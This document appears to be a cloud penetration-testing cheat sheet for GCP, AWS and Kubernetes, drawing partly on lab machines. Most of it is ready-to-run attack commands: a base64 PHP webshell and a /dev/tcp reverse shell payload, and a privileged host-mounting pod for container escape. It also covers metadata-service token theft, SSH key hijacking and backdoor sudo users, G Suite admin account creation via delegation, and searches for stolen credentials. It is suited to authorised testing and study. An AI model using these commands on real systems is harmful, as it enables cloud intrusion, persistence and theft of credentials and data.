scamwork/GCP-Pentest

CLOUD Pentest

GENERAL METHODOLOGY:

  • Benchmark checks
    • Understand the size of the environment and the services used
    • Run the quick misconfiguration checks you can perform
  • Service enumeration
    • What exactly is being used in the cloud environment
  • Check exposed services
  • Check permissions
  • Check integrations

Mindmap pentest GCP

GCP compromise path: MITRE ATT&CK, from initial access to persistence. Comparison AWS / Azure / GCP.

Google Cloud Platform CLI Tool Cheatsheet

By Beau Bullock (@dafthack)

Authentication

Authentication with gcloud

#user identity login
gcloud auth login

#service account login
gcloud auth activate-service-account --key-file creds.json

List accounts available to gcloud

gcloud auth list

Account Information

Get account information

gcloud config list

List organizations

gcloud organizations list

Enumerate IAM policies set ORG-wide

gcloud organizations get-iam-policy <org ID>

Enumerate IAM policies set per project

gcloud projects get-iam-policy <project ID>

List projects

gcloud projects list

Set a different project

gcloud config set project <project name> 

Gives a list of all APIs that are enabled in project

gcloud services list

Get source code repos available to user

gcloud source repos list

Clone repo to home dir

gcloud source repos clone <repo_name>

Virtual Machines

List compute instances

gcloud compute instances list

Get shell access to instance

gcloud beta compute ssh --zone "<region>" "<instance name>" --project "<project name>"

Puts public ssh key onto metadata service for project

gcloud compute ssh <instance name>

Get access scopes if on an instance

curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes -H 'Metadata-Flavor: Google'

Use Google keyring to decrypt encrypted data

gcloud kms decrypt --ciphertext-file=encrypted-file.enc --plaintext-file=out.txt --key <crypto-key> --keyring <crypto-keyring> --location global

Storage Buckets

List Google Storage buckets

gsutil ls

List Google Storage buckets recursively

gsutil ls -r gs://<bucket name>

Copy item from bucket

gsutil cp gs://bucketid/item ~/

Webapps & SQL

List WebApps

gcloud app instances list

List SQL instances

gcloud sql instances list
gcloud spanner instances list
gcloud bigtable instances list

List SQL databases

gcloud sql databases list --instance <instance ID>
gcloud spanner databases list --instance <instance name>

Export SQL databases and buckets

First copy buckets to local directory

gsutil cp gs://bucket-name/folder/ .

Create a new storage bucket, change perms, export SQL DB

gsutil mb gs://<googlestoragename>
gsutil acl ch -u <service account> gs://<googlestoragename>
gcloud sql export sql <sql instance name> gs://<googlestoragename>/sqldump.gz --database=<database name>

Networking

List networks

gcloud compute networks list

List subnets

gcloud compute networks subnets list

List VPN tunnels

gcloud compute vpn-tunnels list

List Interconnects (VPN)

gcloud compute interconnects list

Containers

gcloud container clusters list

GCP Kubernetes config file ~/.kube/config gets generated when you are authenticated with gcloud and run:

gcloud container clusters get-credentials <cluster name> --region <region>

If successful and the user has the correct permissions, the Kubernetes command below can be used to get cluster info:

kubectl cluster-info

Serverless

GCP functions log analysis – May get useful information from logs associated with GCP functions

gcloud functions list
gcloud functions describe <function name>
gcloud functions logs read <function name> --limit <number of lines>

GCP Cloud Run analysis – May get useful information from descriptions such as environment variables.

gcloud run services list
gcloud run services describe <service-name>
gcloud run revisions describe --region=<region> <revision-name>

gcloud stores credentials in ~/.config/gcloud/credentials.db. Search home directories:

sudo find /home -name "credentials.db"

Copy gcloud dir to your own home directory to auth as the compromised user

sudo cp -r /home/username/.config/gcloud ~/.config
sudo chown -R currentuser:currentuser ~/.config/gcloud
gcloud auth list

Metadata Service URL

curl "http://metadata.google.internal/computeMetadata/v1/?recursive=true&alt=text" -H "Metadata-Flavor: Google"
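The recursive dump above comes back as plain key/value text; once saved, high-value attributes such as SSH keys or startup scripts can simply be grepped out. A minimal local sketch, with purely illustrative sample contents:

```shell
# sample recursive metadata dump in text form (contents are illustrative)
cat > /tmp/meta.txt <<'EOF'
instance/attributes/ssh-keys alice:ssh-rsa AAAAB3Nza... alice
instance/attributes/startup-script #!/bin/bash echo boot
project/project-id my-project
EOF

# pull out attribute lines likely to hold secrets
grep -E 'ssh-keys|startup-script' /tmp/meta.txt
```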

BIBLIOGRAPHY

TUTORIALS

LABS

TOOLS

AWS CHEAT SHEET & PRACTICAL CASES

Handy articles :

WEBSHELL

$ cat ~/.aws/credentials
$ echo -n PD9waHAgc3lzdGVtKCRfUkVRVUVTVFsnY21kJ10pOyA/Pgo= | base64 -d > /tmp/shell.php
$ aws s3api list-buckets    # => find a bucket
$ aws s3 cp <file> s3://website/
Payload to send to the webshell (URL-encoded reverse shell): bash+-c+%27bash+-i+%3E%26+/dev/tcp/10.10.14.10/4000+0%3E%261%27

Payload in php file :

<?php system($_REQUEST['cmd']); ?>
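The base64 blob uploaded above decodes to this same one-liner; you can verify it locally:

```shell
# decode the blob from the upload step; prints the PHP webshell
echo -n 'PD9waHAgc3lzdGVtKCRfUkVRVUVTVFsnY21kJ10pOyA/Pgo=' | base64 -d
```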

AWS LAMBDA FUNCTIONS

$ aws configure --profile <profileName>

$ aws lambda list-functions --profile <profileName> --endpoint-url http://cloud.epsilon.htb

$ aws lambda get-function --function-name "costume_shop_v1" --query 'Code.Location' --profile uploadcreds  --endpoint-url http://cloud.epsilon.htb
 > <URL_CODE>

$ wget -O lambda-function.zip <URL_CODE>

S3 BUCKET ENUM

$ aws configure 
 random
 random
 eu-west-1
 random 
 
$ aws --endpoint-url http://s3.DN.com s3 ls nameserver

Upload something:
$ aws s3 --endpoint-url http://s3.DN.com cp . s3://websiteserver --recursive

IF LOCAL RESTRICTION
=> use Chisel for port forwarding
--------------------
./chisel server -p 9001 --reverse     # on the attacker (Kali) machine
./chisel client {IP_ATTACKER}:9001 R:1234:{IP_TARGET_SERVICE}:{TARGET_PORT}     # on the target

then 

$ aws dynamodb list-tables --endpoint-url http://localhost:4566


$ aws --endpoint-url http://localhost:1234 dynamodb scan --table-name users | jq -r '.Items[]'

AZURE CHEAT SHEET & PRACTICAL CASES

Handy articles :

KUBERNETES CHEAT SHEET & PRACTICAL CASES

KUBELETCTL

$ wget https://github.com/cyberark/kubeletctl/releases/download/v1.9/kubeletctl_linux_amd64 && chmod a+x ./kubeletctl_linux_amd64 && mv ./kubeletctl_linux_amd64 /usr/local/bin/kubeletctl

kubeletctl scans nodes for exposed kubelet APIs: RCE in pods, open nodes, etc.

PORT 10250

The kubelet on this port is responsible for managing the containers and pods on the node. Its /pods endpoint lists them:

curl -sk https://10.10.11.133:10250/pods | jq '.items[].metadata.name'

With the node's certificate you can see which pods are on the node and control them.

PORT 8443

With the certificate you can talk to the API server, for example to add a pod (kubectl).

SCAN PODS

$ kubeletctl pods --server 10.10.11.133

SCAN RCE

Scan for RCE:
   $ kubeletctl scan rce --server 10.10.11.133
If vulnerable, get a shell:
   $ kubeletctl --server 10.10.11.133 exec "/bin/bash" -p nginx -c nginx

ESCAPE FROM A POD

Enumerate these service-account paths: /run/secrets/kubernetes.io/serviceaccount, /var/run/secrets/kubernetes.io/serviceaccount, /secrets/kubernetes.io/serviceaccount

Get the token + ca.crt.

get token =>

$ export token=$(kubeletctl -s 10.10.11.133 exec "cat /run/secrets/kubernetes.io/serviceaccount/token" -p nginx -c nginx)

Get the pod's YAML configuration (pod nginx here) =>

$ kubectl get pod nginx -o yaml --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$token

Connect to the API with kubectl (here on port 8443), for example to list pods:

$ kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 get pods

DEVIL YAML to escape :

apiVersion: v1
kind: Pod
metadata:
  name: 0xdf-pod
  namespace: default
spec:
  containers:
  - name: 0xdf-pod
    image: nginx:1.14.2  # !! (retrieved from the pod's YAML configuration) !!
    securityContext:
      privileged: true   # didn't try, but can give root access on the host
    volumeMounts:
    - mountPath: /mnt
      name: hostfs
  volumes:
  - name: hostfs
    hostPath:
      path: /  # !! (mounts / from the host, here is the devil !! >:O) !!
  automountServiceAccountToken: true
  hostNetwork: true

add the pod =>

$ kubectl apply -f evil-pod.yaml --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$token

connect to the pod :
kubeletctl --server 10.10.11.133 exec "/bin/bash"  -p 0xdf-pod  -c 0xdf-pod

Go to /mnt to access the host's /.

By default, when a pod is created without a securityContext, it runs with the rights of the service account that executes it. If you specify securityContext: privileged: true, the pod runs with privileged (root) rights on the host, whose filesystem is reachable here from /mnt.

GCP CHEAT SHEET & PRIVESC

Learning

HACKTRICKS

PAYLOAD ALL THE THINGS

LABS

(For Azure: visualize the attack surface with Stormspotter => BloodHound for Azure)

You need a foothold on the machine, such as a shell, or an SSRF that yields an OAuth token.

AWESOME GCP PENTESTING

BASIC INFORMATION

In order to audit a GCP environment it's very important to know: which services are being used, what is being exposed, who has access to what, and how internal GCP services and external services are connected.

GAIN ACCESS

FOOTHOLD


OBTAIN SOME CREDENTIALS

  • Leaks on GitHub (OSINT)
  • Social engineering
  • Password reuse (from password leaks)
  • Vulnerabilities in GCP-hosted applications, like:
    • Server-Side Request Forgery with access to the metadata endpoint, for example /computeMetadata/v1/project/numeric-project-id
    • Local file read
      • Linux: /home/USERNAME/.config/gcloud/*
      • Windows: C:\Users\USERNAME\.config\gcloud\*
    • Breached 3rd parties
    • Internal employee
  • Leaked key.json file with a private key, to authenticate as a service account
  • Compromising an unauthenticated exposed service, e.g. with cloudscraper — Unauthenticated enum: https://cloud.hacktricks.xyz/pentesting-cloud/gcp-pentesting/gcp-unauthenticated-enum
  • For a pentest: just ask for enough credentials

SSRF

SSRF is a good entry point, giving access to the local metadata endpoint.

SEE ALL THE METADATA of the Compute Engine instance:

http://metadata.google.internal/computeMetadata/v1/?recursive=true&alt=text
Header: Metadata-Flavor: Google

--------------------------
# /project
# Project name and number
curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/project/project-id
curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/project/numeric-project-id
# Project attributes
curl -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/project/attributes/?recursive=true

# /oslogin
# users
curl -s -f  -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/oslogin/users
# groups
curl -s -f  -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/oslogin/groups
# security-keys
curl -s -f  -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/oslogin/security-keys
# authorize
curl -s -f  -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/oslogin/authorize

# /instance
# Description
curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/instance/description
# Hostname
curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/instance/hostname
# ID
curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/instance/id
# Image
curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/instance/image
# Machine Type
curl -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/machine-type
# Name
curl -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/name
# Tags
curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/tags
# Zone
curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/zone
# User data
curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/attributes/startup-script"
# Network Interfaces
for iface in $(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/"); do 
    echo "  IP: "$(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/ip")
    echo "  Subnetmask: "$(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/subnetmask")
    echo "  Gateway: "$(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/gateway")
    echo "  DNS: "$(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/dns-servers")
    echo "  Network: "$(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/network")
    echo "  ==============  "
done
# Service Accounts
for sa in $(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"); do 
    echo "  Name: $sa"
    echo "  Email: "$(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/$sa/email")
    echo "  Aliases: "$(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/$sa/aliases")
    echo "  Identity: "$(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/$sa/identity")
    echo "  Scopes: "$(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/$sa/scopes")
    echo "  Token: "$(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/$sa/token")
    echo "  ==============  "
done
# K8s Attributes
## Cluster location
curl -s -f  -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/attributes/cluster-location
## Cluster name
curl -s -f  -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/attributes/cluster-name
## Os-login enabled
curl -s -f  -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/attributes/enable-oslogin
## Kube-env
curl -s -f  -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/attributes/kube-env
## Kube-labels
curl -s -f  -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/attributes/kube-labels
## Kubeconfig
curl -s -f  -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/attributes/kubeconfig

LINK WITH INTERESTING ENDPOINTS TO TEST

BUCKET ENUM

Bucket policy

https://www.googleapis.com/storage/v1/b/BUCKET_NAME/iam/testPermissions?permissions=storage.buckets.delete&permissions=storage.buckets.get&permissions=storage.buckets.getIamPolicy&permissions=storage.buckets.setIamPolicy&permissions=storage.buckets.update&permissions=storage.objects.create&permissions=storage.objects.delete&permissions=storage.objects.get&permissions=storage.objects.list&permissions=storage.objects.update
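The testPermissions call returns JSON listing the permissions the caller actually holds on the bucket. A sketch of reading such a response offline (the sample JSON below is illustrative):

```shell
# sample testIamPermissions response (illustrative)
cat > /tmp/perms.json <<'EOF'
{"kind": "storage#testIamPermissionsResponse", "permissions": ["storage.objects.get", "storage.objects.list"]}
EOF

# list the granted permissions, one per line
grep -o '"storage\.[a-zA-Z.]*"' /tmp/perms.json | tr -d '"'
```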

Unauthenticated Enum


GCPBucketBrute --> enumerate Google Storage buckets: what access you have to them from your current account, and whether they can be privilege-escalated (if no creds are entered, only unauthenticated access is checked)

Cloud enum OSINT --> OSINT tool enumerating open/protected GCP buckets, Firebase Realtime Databases, Google App Engine sites, etc.

Scout Suite --> presents a clear view of the attack surface

GCM --> lists all IAM role permissions

Firewall Enum --> enumerates instances with network ports exposed

ATTACK GOOGLE KUBERNETES ENGINE

Kubernetes != Compute Engine

Compute Engine is completely unmanaged whereas Kubernetes has automatic updates, etc.

containers / clusters, etc.

PRIVESC TOOLS FOR AFTER FOOTHOLD

PRIVESC

GCPLOIT -> list of tools mentioned in this talk: https://www.youtube.com/watch?v=Ml09R38jpok

GCP Scanner -> what level of access certain credentials possess on GCP; evaluate the impact of an OAuth2 token, for example

Purple Panda -> identifies privilege escalation paths and dangerous permissions

https://www.youtube.com/watch?v=zl5NdvoWHX4 => John Hammond

TECHNIQUES FOR LOCAL PRIVILEGE ESCALATION

TALK => Lateral Movement & Privilege Escalation

Follow the scripts

You can have granular permissions on a specific instance: gsutil ls doesn't work, but gsutil ls gs://instance823............ works!

But how do you know the name "instance823"? Bruteforce? No: this bucket is probably used in a script, so reading scripts too is a good way to understand what the machine is meant to do.
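A quick way to surface such hard-coded bucket names is to grep readable scripts for gs:// URIs. A minimal local sketch (the sample script and bucket name are made up for illustration):

```shell
# a sample script like one you might find on the box (illustrative)
mkdir -p /tmp/demo-scripts
cat > /tmp/demo-scripts/backup.sh <<'EOF'
#!/bin/bash
gsutil cp /var/log/app.log gs://instance823-logs/
EOF

# pull every hard-coded bucket reference out of the scripts
grep -rho 'gs://[a-zA-Z0-9._-]*' /tmp/demo-scripts
```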

Add SSH key to custom metadata

With a service account, modify the metadata and escalate to root by adding your SSH public key to a privileged account.

Modify the public key of an account (HIJACK)

SSH keys live in metadata as one entry per line, in the form username:publickey. If alice has an entry like alice:<alice public key>, the attack is to generate a new key pair and replace alice's public key with our own while keeping the username, so the file ends up like:

alice:<attacker public key>
bob:<bob public key>

access alice account with :

$ ssh -i ./<ATTACKER PRIVATE KEY> alice@localhost

Create a new privilege user

Create a new user and give them sudo rights:

# define the new account username
NEWUSER="definitelynotahacker"

# create a key
ssh-keygen -t rsa -C "$NEWUSER" -f ./key -P ""

# create the input meta file
NEWKEY="$(cat ./key.pub)"
echo "$NEWUSER:$NEWKEY" > ./meta.txt

# update the instance metadata
gcloud compute instances add-metadata [INSTANCE_NAME] --metadata-from-file ssh-keys=meta.txt

# ssh to the new account
ssh -i ./key "$NEWUSER"@localhost

Grant sudo to an existing session

gcloud compute ssh [INSTANCE NAME]

Generate an SSH key, add it to your existing user, and add that user to the google-sudousers group.

OS Login

OS Login links a Google account to SSH access on an instance.

Roles that control SSH access:

  • roles/compute.osLogin (no sudo)
  • roles/compute.osAdminLogin (has sudo)

Lateral Movement

After compromising a VM, let's go further...

Get the list of all instances in the current project: gcloud compute instances list

Without the "Block project-wide SSH keys" parameter set, an instance can be abused with the technique seen previously.

Network config

Firewall may be more permissive for internal IP addresses

List all subnets :

$ gcloud compute networks subnets list

List all external/internal ip of a compute instance :

$ gcloud compute instances list

!! NMAP IS NOTICED BY GOOGLE !!

List all the ports open to the world.

Maybe a breach in another app could allow pivoting (weak SSH or RDP password, default admin passwords, etc.)

0.0.0.0/0 => all ports allowed from the public internet

tool => gcp_firewall_enum
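To spot world-open rules yourself, you could dump the rules as JSON (e.g. gcloud compute firewall-rules list --format=json) and filter for 0.0.0.0/0. A local sketch on a sample dump (rule names are illustrative):

```shell
# sample firewall dump (illustrative; real data comes from gcloud)
cat > /tmp/fw.json <<'EOF'
[
  {"name": "allow-ssh", "sourceRanges": ["0.0.0.0/0"]},
  {"name": "internal-only", "sourceRanges": ["10.0.0.0/8"]}
]
EOF

# print the names of rules open to the whole internet
grep '0\.0\.0\.0/0' /tmp/fw.json | grep -o '"name": "[^"]*"'
```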

Cloud privilege escalation

# First, get the numeric organization ID
$ gcloud organizations list

# Then, enumerate the policies
$ gcloud organizations get-iam-policy [ORG ID]

BYPASSING THE ACCESS SCOPES OF THE OAuth TOKEN

  • find another box with less restrictive access scopes
  • gcloud compute instances list --quiet --format=json

Access scopes only limit OAuth requests...

Connection without OAuth :

  • Put RSA public key on the host (public key authentication)

Check whether any service accounts have had key files exported:

$ for i in $(gcloud iam service-accounts list --format="table[no-heading](email)"); do
    echo Looking for keys for $i:
    gcloud iam service-accounts keys list --iam-account $i
done

In this file you have a private key. You can reauthenticate as the service account with it: $ gcloud auth activate-service-account --key-file [FILE]

Test your new OAuth token to check its scopes:

$ TOKEN=`gcloud auth print-access-token`
$ curl https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=$TOKEN
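The tokeninfo response is JSON whose scope field tells you what the token can do. A sketch of pulling the scope out of a saved response (the sample JSON below is illustrative):

```shell
# sample tokeninfo response (illustrative)
cat > /tmp/tokeninfo.json <<'EOF'
{"issued_to": "1234", "scope": "https://www.googleapis.com/auth/cloud-platform", "expires_in": 3599}
EOF

# extract the granted scope
grep -o '"scope": "[^"]*"' /tmp/tokeninfo.json | cut -d'"' -f4
```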

Inspect the box (a higher-privileged user could have used this machine):

sudo find / -name "gcloud"

Copy any gcloud folder found to a machine you control and run gcloud auth list to see what accounts are now available.

Service account impersonation

Three ways :

  • Authentication using RSA private keys
  • Authorization using Cloud IAM policies
  • Deploying jobs on Google Cloud Platform services

Find a service account with Owner rights, then elevate your Google account on the project you want. The --impersonate-service-account flag allows you to impersonate any account.

# View available service accounts
$ gcloud iam service-accounts list

# Impersonate the account
$ gcloud compute instances list \
    --impersonate-service-account [SERVICE ACCOUNT EMAIL]

Verify the compromised account's project list:

$ gcloud projects list

Hop to that project and start the entire process again:

$ gcloud config set project [PROJECT-ID]

Granting access to management console

The GCP management console is provided only to user accounts, not to service accounts.

Grant access to a Gmail account:

$ gcloud projects add-iam-policy-binding [PROJECT] \
    --member user:[EMAIL] --role roles/editor

Spreading to G Suite

Service accounts in GCP can be granted the rights to programmatically access user data in G Suite by impersonating legitimate users. This is known as domain-wide delegation. It allows actions like reading email in Gmail, accessing Google Docs, and even creating new user accounts in the G Suite organization.

Look at the "domain-wide delegation" column => Enabled

  • get the creds of a service account with G Suite permissions and put them in credentials.json
  • impersonate a user with admin access, then use that access to reset a password

Access the admin console:

# Validate access only
$ ./gcp_delegation.py --keyfile ./credentials.json \
    --impersonate [ADMIN EMAIL] \
    --domain target-org.com

# List the directory
$ ./gcp_delegation.py --keyfile ./credentials.json \
    --impersonate [ADMIN EMAIL] \
    --domain target-org.com \
    --list

# Create a new admin account
$ ./gcp_delegation.py --keyfile ./credentials.json \
    --impersonate [ADMIN EMAIL] \
    --domain target-org.com \
    --account pwned

EXTRACT DATA: TREASURE HUNTING

Accessing databases

  • Cloud SQL
  • Cloud Spanner
  • Cloud Bigtable
  • Cloud Firestore
  • Firebase

Commands to enumerate & identify database targets across the project:

# Cloud SQL
$ gcloud sql instances list
$ gcloud sql databases list --instance [INSTANCE]

# Cloud Spanner
$ gcloud spanner instances list
$ gcloud spanner databases list --instance [INSTANCE]

# Cloud Bigtable
$ gcloud bigtable instances list

If SQL is exposed => mysql -u root -h <host>

Enumerating storage buckets

Don't forget that storage buckets can have secrets inside.

# List all storage buckets in project
$ gsutil ls

# Get detailed info on all buckets in project
$ gsutil ls -L

# List contents of a specific bucket (recursive, so careful!)
$ gsutil ls -r gs://bucket-name/

# Cat the content of a file without copying it locally
$ gsutil cat gs://bucket-name/folder/object

# Copy an object from the bucket to your local storage for review
$ gsutil cp gs://bucket-name/folder/object ~/

CIPHER FILE

It is possible to see decryption keys in keyrings; the best practice is to check docs/scripts for how encryption and decryption are done.

DISPLAY METADATA

# view project metadata
$ curl "http://metadata.google.internal/computeMetadata/v1/project/attributes/?recursive=true&alt=text" \
    -H "Metadata-Flavor: Google"

# view instance metadata
$ curl "http://metadata.google.internal/computeMetadata/v1/instance/attributes/?recursive=true&alt=text" \
    -H "Metadata-Flavor: Google"

Review custom images

Query non-standard images, which may contain sensitive information:

$ gcloud compute images list --no-standard-images

Then export the virtual disk from the image in order to rebuild it locally in a VM for further investigation:

$ gcloud compute images export --image test-image \
    --export-format qcow2 --destination-uri [BUCKET]

Reviewing Custom instance Templates

Templates deploy consistent configurations, and can contain sensitive information too; to investigate:

# List the available templates
$ gcloud compute instance-templates list

# Get the details of a specific template
$ gcloud compute instance-templates describe [TEMPLATE NAME]

Reviewing cloud functions

Reviewing cloud Git repositories

# enumerate what's available
$ gcloud source repos list

# clone a repo locally
$ gcloud source repos clone [REPO NAME]

Searching the local system for secrets

Commands to find secrets once on the system:

TARGET_DIR="/path/to/whatever"

# Service account keys
grep -Pzr "(?s){[^{}]*?service_account[^{}]*?private_key.*?}" \
    "$TARGET_DIR"

# Legacy GCP creds
grep -Pzr "(?s){[^{}]*?client_id[^{}]*?client_secret.*?}" \
    "$TARGET_DIR"

# Google API keys
grep -Pr "AIza[a-zA-Z0-9\\-_]{35}" \
    "$TARGET_DIR"

# Google OAuth tokens
grep -Pr "ya29\.[a-zA-Z0-9_-]{100,200}" \
    "$TARGET_DIR"

# Generic SSH keys
grep -Pzr "(?s)-----BEGIN[ A-Z]*?PRIVATE KEY[a-zA-Z0-9/\+=\n-]*?END[ A-Z]*?PRIVATE KEY-----" \
    "$TARGET_DIR"

# Signed storage URLs
grep -Pir "storage.googleapis.com.*?Goog-Signature=[a-f0-9]+" \
    "$TARGET_DIR"

# Signed policy documents in HTML
grep -Pzr '(?s)<form action.*?googleapis.com.*?name="signature" value=".*?">' \
    "$TARGET_DIR"
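As a sanity check, the Google API key pattern above matches any well-formed AIza key; here it is run against a dummy key (not a real credential):

```shell
# a dummy key in the AIza + 35 URL-safe chars format (not a real key)
echo 'config: apiKey = "AIzaSyA1234567890abcdefghijklmnopqrstuv"' \
    | grep -Po "AIza[a-zA-Z0-9\\-_]{35}"
```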

MISCELLANEOUS

It is impossible to find a VM's IP from the URL alone (dig and nslookup were tried, but in general Google's setup takes the URL, routes to the VM, and returns the results, perhaps without ever exposing the VM's IP directly, so it's hard to know what it is).

Summary

=> Note: protecting your own Google account is also good practice; if the Google account is compromised, the project shell with its associated permissions is obviously accessible too...
